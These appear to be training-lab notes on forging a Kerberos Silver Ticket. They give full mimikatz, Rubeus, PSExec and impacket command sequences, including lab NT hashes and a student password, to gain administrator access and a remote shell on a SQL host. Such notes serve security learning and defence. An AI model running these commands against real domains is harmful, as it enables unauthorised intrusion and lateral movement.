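Silver Ticket: a forged Kerberos service ticket for a single SPN, encrypted with the service account's NT hash.
No TGS request is sent to the DC when the ticket is used, so evidence of it is on the target host (logon events) rather than in the DC's ticket-request logs.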
From Windows:
Import-Module .\PowerView.ps1
Get-DomainSID
mimikatz.exe
kerberos::golden /domain:inlanefreight.local /user:Administrator /sid:S-1-5-21-2974783224-3764228556-2640795941 /rc4:ff955e93a130f5bb1a6565f32b7dc127 /target:sql01.inlanefreight.local /service:cifs /ptt
klist
dir //sql01.inlanefreight.local/c$
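--- OR (save the ticket to sql01.kirbi with /ticket instead of injecting it with /ptt, then load it with Rubeus; the /rc4 value here differs from the one above, presumably from a different lab instance):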
mimikatz.exe "kerberos::golden /domain:inlanefreight.local /user:Administrator /sid:S-1-5-21-2974783224-3764228556-2640795941 /rc4:027c6604526b7b16a22e320b76e54a5b /target:sql01.inlanefreight.local /service:cifs /ticket:sql01.kirbi" exit
Rubeus.exe createnetonly /program:cmd.exe /show
Rubeus.exe ptt /ticket:sql01.kirbi
PSExec.exe -accepteula \\sql01.inlanefreight.local cmd
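From Linux (the domain SID and NT hash below differ from the Windows example, presumably from a different lab instance):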
impacket-lookupsid inlanefreight.local/htb-student:'HTB_@cademy_stdnt!'@dc01.inlanefreight.local -domain-sids
impacket-ticketer -nthash 542780725df68d3456a0672f59001987 -domain-sid S-1-5-21-1870146311-1183348186-593267556 -domain inlanefreight.local -spn cifs/sql01.inlanefreight.local Administrator
export KRB5CCNAME=./Administrator.ccache
impacket-smbclient -k -no-pass sql01.inlanefreight.local
export KRB5CCNAME=./Administrator.ccache
impacket-psexec -k -no-pass sql01.inlanefreight.local